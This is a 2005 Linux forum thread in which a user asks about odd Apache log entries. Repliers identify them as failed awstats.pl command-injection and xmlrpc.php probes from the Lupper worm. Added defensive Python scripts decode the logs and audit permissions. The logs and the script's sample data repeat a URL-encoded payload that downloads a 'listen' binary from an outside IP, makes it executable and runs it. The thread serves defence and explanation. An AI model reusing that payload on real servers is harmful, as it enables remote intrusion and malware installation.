LinuxQuestions.org
Old 11-17-2005, 02:14 PM   #1
simcox1
Member
 
Registered: Mar 2005
Location: UK
Distribution: Slackware
Posts: 794
Blog Entries: 2

Rep: Reputation: 30
are these logs weird?


I've noticed some very strange logs in my apache_log file. When it says chmod I feel a bit worried. This is a sample.

220.194.61.230 - - [17/Nov/2005:10:53:33 +0000] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 302
220.194.61.230 - - [17/Nov/2005:10:53:35 +0000] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 302
220.194.61.230 - - [17/Nov/2005:10:53:36 +0000] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 310
220.194.61.230 - - [17/Nov/2005:10:53:38 +0000] "POST /xmlrpc.php HTTP/1.1" 404 294
220.194.61.230 - - [17/Nov/2005:10:53:40 +0000] "POST /blog/xmlrpc.php HTTP/1.1" 404 299
220.194.61.230 - - [17/Nov/2005:10:53:41 +0000] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 306
220.194.61.230 - - [17/Nov/2005:10:53:43 +0000] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 307
220.194.61.230 - - [17/Nov/2005:10:53:44 +0000] "POST /drupal/xmlrpc.php HTTP/1.1" 404 301
220.194.61.230 - - [17/Nov/2005:10:53:45 +0000] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 307
220.194.61.230 - - [17/Nov/2005:10:53:47 +0000] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 304
220.194.61.230 - - [17/Nov/2005:10:53:48 +0000] "POST /xmlrpc.php HTTP/1.1" 404 294
220.194.61.230 - - [17/Nov/2005:10:53:50 +0000] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 301
220.194.61.230 - - [17/Nov/2005:10:53:51 +0000] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 301
client-82-2-80-26.manc.adsl.virgin.net - - [17/Nov/2005:13:31:28 +0000] "GET / HTTP/1.0" 200 1683
www.nomura-system.co.jp - - [17/Nov/2005:15:15:37 +0000] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 302
www.nomura-system.co.jp - - [17/Nov/2005:15:15:38 +0000] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 302
www.nomura-system.co.jp - - [17/Nov/2005:15:15:40 +0000] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 310
www.nomura-system.co.jp - - [17/Nov/2005:15:15:44 +0000] "POST /xmlrpc.php HTTP/1.1" 404 294
www.nomura-system.co.jp - - [17/Nov/2005:15:15:45 +0000] "POST /blog/xmlrpc.php HTTP/1.1" 404 299
www.nomura-system.co.jp - - [17/Nov/2005:15:15:47 +0000] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 306
www.nomura-system.co.jp - - [17/Nov/2005:15:15:48 +0000] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 307
www.nomura-system.co.jp - - [17/Nov/2005:15:15:49 +0000] "POST /drupal/xmlrpc.php HTTP/1.1" 404 301
www.nomura-system.co.jp - - [17/Nov/2005:15:15:53 +0000] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 307
www.nomura-system.co.jp - - [17/Nov/2005:15:15:55 +0000] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 304
www.nomura-system.co.jp - - [17/Nov/2005:15:15:56 +0000] "POST /xmlrpc.php HTTP/1.1" 404 294
www.nomura-system.co.jp - - [17/Nov/2005:15:15:57 +0000] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 301
www.nomura-system.co.jp - - [17/Nov/2005:15:15:59 +0000] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 301
antispam3.test.mail.sc5.yahoo.com - - [17/Nov/2005:17:06:42 +0000] "GET / HTTP/1.0" 200 1683


Is this anything I need to worry about?
 
Old 11-17-2005, 02:51 PM   #2
ricstirato
Member
 
Registered: Jan 2004
Location: Gießen, Germany
Distribution: Xubuntu 12.04, Mythbuntu, Ubuntu Server 12.04
Posts: 174

Rep: Reputation: 24
These requests are simply trying to find known security holes in web applications.
As long as you don't have these installed, there's no reason to worry.

Such "attacks" are quite common. You might also find lots of login attempts using common usernames (root, bin, webmaster, ...) in your /var/log/secure (or /var/log/auth.log, depending on distro).

The 404 codes (meaning "not found") show that you don't have any of these apps running.
The chmod has been given as a parameter to the (probably vulnerable) awstats.pl script, which you don't seem to have.

If you ever get a non-4xx code, you may start worrying.

Regards
ric.

Last edited by ricstirato; 11-17-2005 at 02:55 PM.
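Added example, not part of ric's post or of any tool from the thread: a small Python triage script that applies the rule of thumb above to Apache access-log lines. It URL-decodes the awstats.pl `configdir` payload so the injected shell commands (the cd, wget, chmod and ./listen that worried the original poster) become readable, tags the awstats and xmlrpc.php probes, and reports per source host only those probes that were answered with something other than a 4xx status. The first five sample lines are copied from the log posted above; the 192.0.2.10 line (a documentation address) is constructed to show what a probe that actually reached a script would look like. Function names such as `classify` and `triage` are mine.

```python
import re
from urllib.parse import unquote

# Apache common log format: host ident user [time] "method target proto" status bytes
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: (?P<proto>[^"]*))?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Characters that let a CGI parameter escape into a shell once awstats.pl
# feeds configdir to a pipe: | ; backtick $(
SHELL_META = re.compile(r'[|;`]|\$\(')

# Sample input. The first five lines are copied from the thread; the
# 192.0.2.10 line is constructed to show a probe that reached a real
# script and got a 200 instead of a 404.
SAMPLE_LOG = [
    '220.194.61.230 - - [17/Nov/2005:10:53:33 +0000] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 302',
    '220.194.61.230 - - [17/Nov/2005:10:53:35 +0000] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 302',
    '220.194.61.230 - - [17/Nov/2005:10:53:38 +0000] "POST /xmlrpc.php HTTP/1.1" 404 294',
    '220.194.61.230 - - [17/Nov/2005:10:53:47 +0000] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 304',
    'client-82-2-80-26.manc.adsl.virgin.net - - [17/Nov/2005:13:31:28 +0000] "GET / HTTP/1.0" 200 1683',
    '192.0.2.10 - - [17/Nov/2005:18:00:00 +0000] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 200 512',
]


def parse_line(line):
    """Split one access-log line into fields; the query string is URL-decoded."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec['status'] = int(rec['status'])
    path, _, query = rec['target'].partition('?')
    rec['path'] = path
    rec['query'] = unquote(query)   # %2f -> /  %3b -> ;  %2b -> +  %2e -> .
    return rec


def classify(rec):
    """Label what a request is probing for, or None if it looks ordinary."""
    path = rec['path'].lower()
    if (path.endswith('awstats.pl') and 'configdir=' in rec['query']
            and SHELL_META.search(rec['query'])):
        return 'awstats-configdir-injection'
    if path.endswith('xmlrpc.php') and rec['method'] == 'POST':
        return 'xmlrpc-probe'
    return None


def extract_commands(query):
    """Return the shell commands wrapped in configdir=|...| as a list."""
    m = re.search(r'configdir=\|(.*)\|', query)
    if not m:
        return []
    return [c.strip() for c in m.group(1).split(';') if c.strip()]


def triage(lines):
    """Group probes by source host. A 'hit' is a probe answered with a
    status outside 4xx, i.e. the script the attacker looked for exists."""
    report = {}
    for line in lines:
        rec = parse_line(line)
        label = classify(rec) if rec else None
        if not label:
            continue
        entry = report.setdefault(rec['host'],
                                  {'probes': 0, 'labels': set(), 'hits': []})
        entry['probes'] += 1
        entry['labels'].add(label)
        if not 400 <= rec['status'] < 500:
            entry['hits'].append((rec['path'], rec['status']))
    return report


if __name__ == '__main__':
    for host, info in triage(SAMPLE_LOG).items():
        verdict = 'INVESTIGATE' if info['hits'] else 'noise'
        print(f"{host}: {info['probes']} probes {sorted(info['labels'])} -> {verdict}")
    print(extract_commands(parse_line(SAMPLE_LOG[0])['query']))
```

Run against a real log with `triage(open('/var/log/httpd/access_log'))`. The decoded command list makes the point of the reply concrete: the chmod never ran on this box, it is just text inside a URL that a vulnerable awstats.pl would have passed to a shell. A host with anything in `hits` is the case worth looking at, starting with whether a `listen` binary turned up in /tmp.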
 
Old 11-17-2005, 03:01 PM   #3
Finlay
Senior Member
 
Registered: Mar 2003
Location: Seattle
Distribution: Slackware ?-14.1
Posts: 1,029

Rep: Reputation: 47
As long as your webserver is running as nobody/nobody
and you don't have any scripts set to world RWX, then you are fine, even if you happen to have awstats installed.
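Added example, not Finlay's code: a Python check for the two conditions in his post, read as (a) the User/Group directives in httpd.conf point at an unprivileged account and (b) nothing under the document root is world-writable. The httpd.conf fragment and the throwaway document root are constructed for the demo; the directory layout, file names and the `audit` function are assumptions, not anything from the thread.

```python
import os
import re
import stat
import tempfile

# Directives are matched at line start so '# User apache' and 'UserDir'
# are not mistaken for the real setting.
USER_RE = re.compile(r'^\s*User\s+(\S+)', re.MULTILINE)
GROUP_RE = re.compile(r'^\s*Group\s+(\S+)', re.MULTILINE)

# Constructed httpd.conf fragment (not from the thread) with the
# nobody/nobody identity Finlay's post refers to.
SAMPLE_CONF = """
ServerRoot "/usr"
# User apache
User nobody
Group nobody
UserDir public_html
"""


def parse_httpd_identity(conf_text):
    """Return (user, group) that httpd switches to after binding its port."""
    u = USER_RE.search(conf_text)
    g = GROUP_RE.search(conf_text)
    return (u.group(1) if u else None, g.group(1) if g else None)


def find_world_writable(root):
    """Return (relative path, mode) for every file or directory under root
    that any local account, the httpd identity included, could modify."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if stat.S_ISLNK(st.st_mode):
                continue  # a symlink's own mode means nothing; judge its target separately
            if st.st_mode & stat.S_IWOTH:
                findings.append((os.path.relpath(path, root),
                                 oct(stat.S_IMODE(st.st_mode))))
    return sorted(findings)


def build_demo_docroot():
    """Constructed throwaway docroot: a sanely-permissioned CGI, one
    world-writable script, and a world-writable directory."""
    root = tempfile.mkdtemp(prefix='docroot-')
    cgi = os.path.join(root, 'cgi-bin')
    os.mkdir(cgi)
    for name, mode in (('awstats.pl', 0o755), ('counter.cgi', 0o777)):
        path = os.path.join(cgi, name)
        with open(path, 'w') as f:
            f.write('#!/usr/bin/perl\n')
        os.chmod(path, mode)
    uploads = os.path.join(root, 'uploads')
    os.mkdir(uploads)
    os.chmod(uploads, 0o777)
    return root


def audit(root, conf_text):
    """Combine both checks into one report."""
    user, group = parse_httpd_identity(conf_text)
    return {
        'identity': (user, group),
        'unprivileged': user not in (None, 'root'),
        'world_writable': find_world_writable(root),
    }


if __name__ == '__main__':
    root = build_demo_docroot()
    for key, value in audit(root, SAMPLE_CONF).items():
        print(f'{key}: {value}')
```

On a live box call `audit('/var/www/htdocs', open('/etc/apache/httpd.conf').read())` (paths assumed; adjust to the distribution). The world-writable list is the part that matters for this thread: a CGI the httpd user can overwrite is exactly what an injected `wget ...; chmod +x ...` sequence would turn into a persistent foothold, whereas a read-only, root-owned script limits a successful injection to whatever the nobody account can do.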
 
Old 11-17-2005, 03:27 PM   #4
simcox1
Member
 
Registered: Mar 2005
Location: UK
Distribution: Slackware
Posts: 794

Original Poster
Blog Entries: 2

Rep: Reputation: 30
Yes, I read the security warning at the top of the forum which seemed to relate to awstats and thought it might be that. I did have awstats installed but don't at the moment. I noticed the attempts were failing, but it's being quite persistent. Is it worth trying to block specific domains or IPs? Nothing to worry about at the moment anyway.
 
Old 11-17-2005, 03:29 PM   #5
Finlay
Senior Member
 
Registered: Mar 2003
Location: Seattle
Distribution: Slackware ?-14.1
Posts: 1,029

Rep: Reputation: 47
You can block domains or subnets if you want, but from experience with my log files, you will be adding 1 or 2 a day forever.
 
Old 11-17-2005, 04:32 PM   #6
ricstirato
Member
 
Registered: Jan 2004
Location: Gießen, Germany
Distribution: Xubuntu 12.04, Mythbuntu, Ubuntu Server 12.04
Posts: 174

Rep: Reputation: 24
Full ack to Finlay. Blocking domains would be a never ending work. Worst case you might block normal visitors that come from these domains or address ranges.

Just make sure you have enough free space for log files ;-)

Regards
ric.
 
Old 11-29-2005, 01:22 PM   #7
hal_2001
LQ Newbie
 
Registered: Oct 2003
Location: UK
Distribution: Mandriva, Red Hat, Fedora Core, MontaVista
Posts: 23

Rep: Reputation: 16
This is the Linux Lupper worm...
 
  

